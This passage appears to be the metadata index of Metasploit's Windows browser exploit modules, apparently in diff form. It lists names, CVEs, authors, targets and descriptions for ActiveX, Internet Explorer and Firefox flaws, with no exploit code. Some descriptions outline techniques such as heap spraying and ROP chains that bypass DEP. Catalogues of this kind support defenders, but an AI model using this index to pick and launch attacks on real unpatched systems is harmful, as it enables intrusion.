"targets": [ - "Windows XP Pro SP3 English", - "Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb", - "is_install_path": true, - "ref_name": "windows/browser/juniper_sslvpn_ive_setupdll", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/kazaa_altnet_heap": { - "name": "Kazaa Altnet Download Manager ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/kazaa_altnet_heap", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n By sending an overly long string to the \"Install()\" method, an attacker may be\n able to execute arbitrary code.", - "references": [ - "CVE-2007-5217", - "OSVDB-37785", - "URL-http://web.archive.org/web/20071014051150/http://secunia.com:80/advisories/26970" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / IE 6.0SP1 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/kazaa_altnet_heap.rb", - "is_install_path": true, - "ref_name": "windows/browser/kazaa_altnet_heap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/keyhelp_launchtripane_exec": { - "name": "KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability", - "fullname": "exploit/windows/browser/keyhelp_launchtripane_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-26", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a code execution vulnerability in the KeyScript ActiveX\n control from keyhelp.ocx. It is packaged in several products or GE, such as\n Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy\n Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver between 7.20 and 7.42.\n When the control is installed with these products, the function \"LaunchTriPane\"\n will use ShellExecute to launch \"hh.exe\", with user controlled data as parameters.\n Because of this, the \"-decompile\" option can be abused to write arbitrary files on\n the remote system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine, and then upload another mof file, which enables Windows Management\n Instrumentation service to execute it. Please note that this module currently only\n works for Windows before Vista.\n\n On the other hand, the target host must have the WebClient service (WebDAV\n Mini-Redirector) enabled. It is enabled and automatically started by default on\n Windows XP SP3", - "references": [ - "CVE-2012-2516", - "OSVDB-83311", - "BID-55265", - "ZDI-12-169", - "URL-http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB14863" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/keyhelp_launchtripane_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/browser/logitechvideocall_start": { - "name": "Logitech VideoCall ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/logitechvideocall_start", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-05-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the\n \"Start()\" method, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-2918", - "OSVDB-36820", - "BID-24254" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/logitechvideocall_start.rb", - "is_install_path": true, - "ref_name": "windows/browser/logitechvideocall_start", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/lpviewer_url": { - "name": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/lpviewer_url", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-06", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\n sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-4384", - "OSVDB-48946", - "US-CERT-VU-848873", - "BID-31604" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/lpviewer_url.rb", - "is_install_path": true, - "ref_name": "windows/browser/lpviewer_url", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/macrovision_downloadandexecute": { - "name": "Macrovision InstallShield Update Service Buffer Overflow", - "fullname": "exploit/windows/browser/macrovision_downloadandexecute", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-10-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Macrovision InstallShield Update\n Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to\n the DownloadAndExecute method, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-5660", - "OSVDB-38347" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0/SP1 Pro English", - "Windows 2000 Pro English All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/macrovision_downloadandexecute.rb", - "is_install_path": true, - "ref_name": "windows/browser/macrovision_downloadandexecute", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/macrovision_unsafe": { - "name": "Macrovision InstallShield Update Service ActiveX Unsafe Method", - "fullname": "exploit/windows/browser/macrovision_unsafe", - "aliases": [], - "rank": 600, - "disclosure_date": "2007-10-20", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module allows attackers to execute code via an unsafe method in Macrovision InstallShield 2008.", - "references": [ - "CVE-2007-5660", - "OSVDB-38347", - "BID-26280" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/macrovision_unsafe.rb", - "is_install_path": true, - "ref_name": "windows/browser/macrovision_unsafe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/malwarebytes_update_exec": { - "name": "Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution", - "fullname": "exploit/windows/browser/malwarebytes_update_exec", - "aliases": [], - "rank": 400, - "disclosure_date": "2014-12-16", - "type": "exploit", - "author": [ - "Yonathan Klijnsma", - "Gabor Seljan", - "todb " - ], - "description": "This module exploits a vulnerability in the update functionality of\n Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n Anti-Exploit consumer 1.03.1.1220.\n Due to the lack of proper update package validation, a man-in-the-middle\n (MITM) attacker could execute arbitrary code by spoofing the update server\n data-cdn.mbamupdates.com and uploading an executable. This module has\n been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.", - "references": [ - "CVE-2014-4936", - "OSVDB-116050", - "URL-http://web.archive.org/web/20241212224255/http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2025-02-07 12:36:11 +0000", - "path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/malwarebytes_update_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/maxthon_history_xcs": { - "name": "Maxthon3 about:history XCS Trusted Zone Code Execution", - "fullname": "exploit/windows/browser/maxthon_history_xcs", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-11-26", - "type": "exploit", - "author": [ - "Roberto Suggi Liverani", - "sinn3r ", - "juan vazquez " - ], - "description": "Cross Context Scripting (XCS) is possible in the Maxthon about:history page.\n Injection in such privileged/trusted browser zone can be used to modify\n configuration settings and execute arbitrary commands.\n\n Please note this module only works against specific versions of XCS. Currently,\n we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.", - "references": [ - "OSVDB-88191", - "EDB-23225", - "URL-http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Maxthon 3 (prior to 3.3) on Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/maxthon_history_xcs.rb", - "is_install_path": true, - "ref_name": "windows/browser/maxthon_history_xcs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mcafee_mcsubmgr_vsprintf": { - "name": "McAfee Subscription Manager Stack Buffer Overflow", - "fullname": "exploit/windows/browser/mcafee_mcsubmgr_vsprintf", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-08-01", - "type": "exploit", - "author": [ - "skape " - ], - "description": "This module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n passing a large string to one of the COM-exposed routines, such as IsAppExpired.\n This vulnerability was discovered by Karl Lynn of eEye.", - "references": [ - "CVE-2006-3961", - "OSVDB-27698", - "BID-19265" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb", - "is_install_path": true, - "ref_name": "windows/browser/mcafee_mcsubmgr_vsprintf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mcafee_mvt_exec": { - "name": "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability", - "fullname": "exploit/windows/browser/mcafee_mvt_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-04-30", - "type": "exploit", - "author": [ - "rgod", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in McAfee Virtual Technician's\n MVTControl. This ActiveX control can be abused by using the GetObject() function\n to load additional unsafe classes such as WScript.Shell, therefore allowing remote\n code execution under the context of the user.", - "references": [ - "CVE-2012-4598", - "OSVDB-81657", - "EDB-18805", - "URL-https://kc.mcafee.com/corporate/index?page=content&id=SB10028" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mcafee_mvt_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/mcafee_mvt_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mcafeevisualtrace_tracetarget": { - "name": "McAfee Visual Trace ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/mcafeevisualtrace_tracetarget", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-07-07", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the\n \"TraceTarget()\" method, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2006-6707", - "OSVDB-32399", - "URL-http://web.archive.org/web/20061223042405/http://secunia.com:80/advisories/23463/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP2 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb", - "is_install_path": true, - "ref_name": "windows/browser/mcafeevisualtrace_tracetarget", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mirc_irc_url": { - "name": "mIRC IRC URL Buffer Overflow", - "fullname": "exploit/windows/browser/mirc_irc_url", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-10-13", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in mIRC 6.1. By\n submitting an overly long and specially crafted URL to\n the 'irc' protocol, an attacker can overwrite the buffer\n and control program execution.", - "references": [ - "CVE-2003-1336", - "OSVDB-2665", - "BID-8819" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English All", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mirc_irc_url.rb", - "is_install_path": true, - "ref_name": "windows/browser/mirc_irc_url", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_attribchildremoved": { - "name": "Firefox 8/9 AttributeChildRemoved() Use-After-Free", - "fullname": "exploit/windows/browser/mozilla_attribchildremoved", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-12-06", - "type": "exploit", - "author": [ - "regenrecht", - "Lincoln ", - "corelanc0d3r " - ], - "description": "This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1.\n Removal of child nodes from the nsDOMAttribute can allow for a child\n to still be accessible after removal due to a premature notification\n of AttributeChildRemoved. Since mFirstChild is not set to NULL until\n after this call is made, this means the removed child will be accessible\n after it has been removed. By carefully manipulating the memory layout,\n this can lead to arbitrary code execution.", - "references": [ - "CVE-2011-3659", - "OSVDB-78736", - "ZDI-12-110", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708198" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP - Firefox 8 / 8.0.1", - "Windows XP - Firefox 9", - "Windows XP - Firefox 9.0.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_attribchildremoved.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_attribchildremoved", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_firefox_onreadystatechange": { - "name": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free", - "fullname": "exploit/windows/browser/mozilla_firefox_onreadystatechange", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-25", - "type": "exploit", - "author": [ - "Nils", - "Unknown", - "w3bd3vil", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild on 2013 August to target Tor Browser users.", - "references": [ - "CVE-2013-1690", - "OSVDB-94584", - "BID-60778", - "URL-https://www.mozilla.org/security/announce/2013/mfsa2013-53.html", - "URL-https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=901365", - "URL-http://krash.in/ffn0day.txt", - "URL-http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Firefox 17 & Firefox 21 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_firefox_onreadystatechange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_firefox_xmlserializer": { - "name": "Firefox XMLSerializer Use After Free", - "fullname": "exploit/windows/browser/mozilla_firefox_xmlserializer", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-08", - "type": "exploit", - "author": [ - "regenrecht", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically\n a use-after-free of an Element object, when using the serializeToStream method\n with a specially crafted OutputStream defining its own write function. This module\n has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP\n SP3.", - "references": [ - "CVE-2013-0753", - "OSVDB-89021", - "BID-57209", - "ZDI-13-006", - "URL-http://www.mozilla.org/security/announce/2013/mfsa2013-16.html", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=814001" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Firefox 17 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_firefox_xmlserializer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_interleaved_write": { - "name": "Mozilla Firefox Interleaved document.write/appendChild Memory Corruption", - "fullname": "exploit/windows/browser/mozilla_interleaved_write", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-10-25", - "type": "exploit", - "author": [ - "unknown", - "scriptjunkie" - ], - "description": "This module exploits a code execution vulnerability in Mozilla\n Firefox caused by interleaved calls to document.write and appendChild.\n This module was written based on a live exploit found in the wild.", - "references": [ - "CVE-2010-3765", - "OSVDB-68905", - "BID-15352", - "EDB-15352", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=607222", - "URL-http://www.mozilla.org/security/announce/2010/mfsa2010-73.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_interleaved_write.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_interleaved_write", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_mchannel": { - "name": "Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability", - "fullname": "exploit/windows/browser/mozilla_mchannel", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-10", - "type": "exploit", - "author": [ - "regenrecht", - "Rh0", - "mr_me " - ], - "description": "This module exploits a use after free vulnerability in Mozilla\n Firefox 3.6.16. An OBJECT Element mChannel can be freed via the\n OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel\n becomes a dangling pointer and can be reused when setting the OBJECTs\n data attribute. (Discovered by regenrecht). This module uses heapspray\n with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionlay,\n a windows 7 target was provided using JAVA 6 and below to avoid aslr.", - "references": [ - "CVE-2011-0065", - "OSVDB-72085", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986", - "URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Firefox 3.6.16 on Windows XP SP3", - "Firefox 3.6.16 on Windows 7 + Java" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_mchannel.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_mchannel", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_nssvgvalue": { - "name": "Firefox nsSVGValue Out-of-Bounds Access Vulnerability", - "fullname": "exploit/windows/browser/mozilla_nssvgvalue", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-12-06", - "type": "exploit", - "author": [ - "regenrecht", - "Lincoln ", - "corelanc0d3r " - ], - "description": "This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1).\n The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y)\n uses a loop which can result in an out-of-bounds access to attacker-controlled memory.\n The mObserver ElementAt() function (which picks up pointers), does not validate\n if a given index is out of bound. If a custom observer of nsSVGValue is created,\n which removes elements from the original observer,\n and memory layout is manipulated properly, the ElementAt() function might pick up\n an attacker provided pointer, which can be leveraged to gain remote arbitrary\n code execution.", - "references": [ - "CVE-2011-3658", - "OSVDB-77953", - "ZDI-12-056", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708186" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP - Firefox 7", - "Windows XP - Firefox 8 (<= 8.0.1)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_nssvgvalue.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_nssvgvalue", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_nstreerange": { - "name": "Mozilla Firefox \"nsTreeRange\" Dangling Pointer Vulnerability", - "fullname": "exploit/windows/browser/mozilla_nstreerange", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-02", - "type": "exploit", - "author": [ - "regenrecht", - "xero" - ], - "description": "This module exploits a code execution vulnerability in Mozilla Firefox\n 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n By overwriting a subfunction of invalidateSelection it is possible to free the\n nsTreeRange object that the function currently operates on.\n Any further operations on the freed object can result in remote code execution.\n Utilizing the call setup the function provides it's possible to bypass DEP\n without the need for a ROP. Sadly this exploit is still either dependent\n on Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n modules anymore.", - "references": [ - "CVE-2011-0073", - "OSVDB-72087", - "BID-47663", - "ZDI-11-157", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=630919", - "URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Auto (Direct attack against Windows XP, otherwise through Java, if enabled)", - "Firefox Runtime, fails with ASLR", - "Java Runtime (7.10.3052.4), best against ASLR", - "Java JVM (20.1.0.02)", - "Java Regutils (6.0.260.3)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_nstreerange.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_nstreerange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_reduceright": { - "name": "Mozilla Firefox Array.reduceRight() Integer Overflow", - "fullname": "exploit/windows/browser/mozilla_reduceright", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-06-21", - "type": "exploit", - "author": [ - "Chris Rohlf", - "Yan Ivnitskiy", - "Matteo Memelli", - "dookie2000ca", - "sinn3r ", - "mr_me ", - "TecR0c " - ], - "description": "This module exploits a vulnerability found in Mozilla Firefox 3.6. When an\n array object is configured with a large length value, the reduceRight() method\n may cause an invalid index being used, allowing arbitrary remote code execution.\n Please note that the exploit requires a longer amount of time (compare to a\n typical browser exploit) in order to gain control of the machine.", - "references": [ - "CVE-2011-2371", - "OSVDB-73184", - "EDB-17974", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=664009" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Mozilla Firefox 3.6.16 (no JAVA)", - "Mozilla Firefox 3.6.16 (JAVA)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_reduceright.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_reduceright", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms03_020_ie_objecttype": { - "name": "MS03-020 Microsoft Internet Explorer Object Type", - "fullname": "exploit/windows/browser/ms03_020_ie_objecttype", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-06-04", - "type": "exploit", - "author": [ - "skape " - ], - "description": "This module exploits a vulnerability in Internet Explorer's\n handling of the OBJECT type attribute.", - "references": [ - "CVE-2003-0344", - "OSVDB-2967", - "BID-7806", - "MSB-MS03-020" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows NT/XP/2003 Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms03_020_ie_objecttype", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms05_054_onload": { - "name": "MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution", - "fullname": "exploit/windows/browser/ms05_054_onload", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-11-21", - "type": "exploit", - "author": [ - "Benjamin Tobias Franz", - "Stuart Pearson", - "Sam Sharps" - ], - "description": "This bug is triggered when the browser handles a JavaScript 'onLoad' handler in\n conjunction with an improperly initialized 'window()' JavaScript function.\n This exploit results in a call to an address lower than the heap. The javascript\n prompt() places our shellcode near where the call operand points to. We call\n prompt() multiple times in separate iframes to place our return address.\n We hide the prompts in a popup window behind the main window. We spray the heap\n a second time with our shellcode and point the return address to the heap. I use\n a fairly high address to make this exploit more reliable. IE will crash when the\n exploit completes. Also, please note that Internet Explorer must allow popups\n in order to continue exploitation.", - "references": [ - "MSB-MS05-054", - "CVE-2005-1790", - "OSVDB-17094", - "BID-13799" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Internet Explorer 6 on Windows XP", - "Internet Explorer 6 Windows 2000" - ], - "mod_time": "2021-04-05 13:03:42 +0000", - "path": "/modules/exploits/windows/browser/ms05_054_onload.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms05_054_onload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_001_wmf_setabortproc": { - "name": "Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution", - "fullname": "exploit/windows/browser/ms06_001_wmf_setabortproc", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-12-27", - "type": "exploit", - "author": [ - "hdm ", - "san ", - "O600KO78RUS " - ], - "description": "This module exploits a vulnerability in the GDI library included with\n Windows XP and 2003. This vulnerability uses the 'Escape' metafile function\n to execute arbitrary code through the SetAbortProc procedure. This module\n generates a random WMF record stream for each request.", - "references": [ - "CVE-2005-4560", - "OSVDB-21987", - "MSB-MS06-001", - "BID-16074", - "URL-http://wvware.sourceforge.net/caolan/ora-wmf.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP/2003/Vista Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_001_wmf_setabortproc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_013_createtextrange": { - "name": "MS06-013 Microsoft Internet Explorer createTextRange() Code Execution", - "fullname": "exploit/windows/browser/ms06_013_createtextrange", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-03-19", - "type": "exploit", - "author": [ - "Faithless ", - "Darkeagle ", - "hdm ", - "justfriends4n0w ", - "Unknown" - ], - "description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer.\n Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under\n certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point\n to a very remote, non-existent memory location. This module is the result of merging three\n different exploit submissions and has only been reliably tested against Windows XP SP2.\n This vulnerability was independently discovered by multiple parties. The heap spray method\n used by this exploit was pioneered by Skylined.", - "references": [ - "CVE-2006-1359", - "OSVDB-24050", - "MSB-MS06-013", - "BID-17196", - "US-CERT-VU-876678", - "URL-http://web.archive.org/web/20060418044756/http://secunia.com:80/secunia_research/2006-7/advisory/", - "URL-https://seclists.org/lists/bugtraq/2006/Mar/0410.html", - 